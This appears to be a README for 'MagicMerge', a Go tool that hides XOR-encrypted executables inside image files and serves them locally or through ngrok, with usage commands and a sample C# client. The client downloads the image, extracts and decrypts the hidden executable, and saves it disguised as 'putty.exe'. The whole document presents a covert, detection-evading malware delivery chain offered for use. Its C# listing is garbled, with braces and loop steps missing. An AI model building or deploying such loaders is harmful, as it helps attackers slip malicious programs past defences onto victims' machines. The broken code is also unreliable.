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MagicMerge is a sophisticated payload delivery server for cybersecurity professionals and red team operators. It offers a powerful yet covert method for embedding and encrypting executables within images, enabling secure payload delivery and execution in environments where discretion and evasion are paramount.

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MagicMerge is a sophisticated payload delivery server for cybersecurity professionals and red team operators. It offers a powerful yet covert method for embedding and encrypting executables within images enabling secure payload delivery and execution in environments where discretion and evasion are paramount.

Product Screenshot

🗳️ Features:

Stealthy Embedding

  • Description: MagicMerge allows for the embedding of executables directly within image files, creating an unobtrusive method of delivering payloads that bypasses common security measures.
  • Benefit: Increases operational success by evading detection from security systems that scan for suspicious binary formats.

Robust XOR Encryption

  • Description: MagicMerge encrypts executables embedded within images using a dynamically generated 16-byte XOR key, ensuring robust protection against unauthorized access and analysis.
  • Benefit: Maintains the integrity and confidentiality of the payload, protecting sensitive data from potential breaches.

Flexible Deployment Options

  • Description: The tool supports both local and ngrok-enabled public hosting, allowing payloads to be accessed over internal networks or the internet, depending on operational needs.
  • Benefit: Offers versatility in deployment, making it suitable for a range of scenarios from controlled internal tests to wide-reaching external deployments.

Command-Line Interface

  • Description: Operates entirely via a command-line interface, facilitating rapid deployment, scripting, and integration with existing cybersecurity tool chains.
  • Benefit: Enhances usability and efficiency, allowing users to execute operations quickly and automate processes as needed.

Cross-Platform Compatibility

  • Description: Built in Go, MagicMerge is inherently cross-platform, running seamlessly on Windows, macOS, and Linux.
  • Benefit: Ensures consistent performance and functionality across different operating systems, which is crucial for teams working in diverse IT environments.

Easy Configuration and Customization

  • Description: Simple configuration options via command-line flags enable quick setup and adjustments to fit specific operational requirements.
  • Benefit: Allows for easy customization and fine-tuning, improving operational effectiveness and adaptability.

Dynamic XOR Key Generation

  • Description: Generates a new XOR key for each session, enhancing the security of each encrypted payload.
  • Benefit: Prevents the compromise of one payload from affecting others, safeguarding multiple deployments simultaneously.

Random Image Fetching

  • Description: Automatically fetches a new, random image for each payload from a designated source to ensure each payload is uniquely camouflaged.
  • Benefit: Increases security by preventing pattern recognition in payload deliveries, crucial for operations requiring high stealth.

Flexible Payload Sourcing

  • Description: Allows users to source executables from URLs or local storage, accommodating diverse input needs and operational environments.
  • Benefit: Adapts to varying scenarios easily, from centrally managed payloads that can be updated remotely to securely handled local files for restricted environments.

🛠️ Installation Steps:

1. Download and Install Go (Windows)

2. Install support libraries

go get

3. Set ngrok in Enviorment Variable path


4. Compilation Command:

go build -o magicmerge.exe .

ℹ️ Usage Examples:

1. Run with Ngrok and Payload from url.

magicmerge.exe -payload="YourPayloadURL" -url=true -ngrok=true

1. Run with local go server and Payload from local storage.

magicmerge.exe -payload="/payload.exe" -url=false -ngrok=false

🗒️ TODO:

  • LocalXpose support
  • SSL support
  • Multiple Payload handling with diffirent routes
  • AES 256 instead of XOR
  • Web Dashboard
  • Auto SSL Cert generate
  • Log File

📡 Sample Client Code (c#) :

 internal class Program

     static void Main(string[] args)
         string pathToCombinedFile = "wallpaper.jpg";
         string outputPath = "putty.exe";
         ExtractAndDecryptExecutable(pathToCombinedFile, outputPath);

     public static void DownloadPayload(string URL,string path)
         using (WebClient client = new WebClient())
                 client.DownloadFile(URL, path);
                 Console.WriteLine("Download completed successfully.");
             catch (Exception ex)
                 Console.WriteLine("An error occurred: " + ex.Message);

     public static void ExtractAndDecryptExecutable(string combinedFilePath, string outputExePath)
             byte[] combinedData = File.ReadAllBytes(combinedFilePath);

             int keyLength = 16;
             byte[] key = new byte[keyLength];
             Array.Copy(combinedData, combinedData.Length - keyLength, key, 0, keyLength);

             byte[] delimiter = new byte[] { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF };
             int delimiterIndex = IndexOf(combinedData, delimiter);

             if (delimiterIndex == -1)
                 Console.WriteLine("Delimiter not found.");

             int startOfExe = delimiterIndex + delimiter.Length;
             int exeLength = combinedData.Length - startOfExe - keyLength;

             if (exeLength <= 0)
                 Console.WriteLine("No executable data found.");

             byte[] exeData = new byte[exeLength];
             for (int i = 0; i < exeData.Length; i++)
                 exeData[i] = (byte)(combinedData[startOfExe + i] ^ key[i % key.Length]);

             File.WriteAllBytes(outputExePath, exeData);
             Console.WriteLine($"Executable has been extracted and decrypted to {outputExePath}");
         catch (Exception ex)
             Console.WriteLine($"An error occurred: {ex.Message}");

     private static int IndexOf(byte[] source, byte[] pattern)
         int[] lps = ComputeLpsArray(pattern);
         int i = 0;  
         int j = 0;  
         while (i < source.Length)
             if (pattern[j] == source[i])
             if (j == pattern.Length)
                 return i - j;
             else if (i < source.Length && pattern[j] != source[i])
                 if (j != 0)
                     j = lps[j - 1];
                     i = i + 1;
         return -1;

     private static int[] ComputeLpsArray(byte[] pattern)
         int length = 0;
         int i = 1;
         int[] lps = new int[pattern.Length];
         lps[0] = 0;

         while (i < pattern.Length)
             if (pattern[i] == pattern[length])
                 lps[i] = length;
                 if (length != 0)
                     length = lps[length - 1];
                     lps[i] = 0;
         return lps;



MagicMerge is a sophisticated payload delivery server for cybersecurity professionals and red team operators. It offers a powerful yet covert method for embedding and encrypting executables within images, enabling secure payload delivery and execution in environments where discretion and evasion are paramount.






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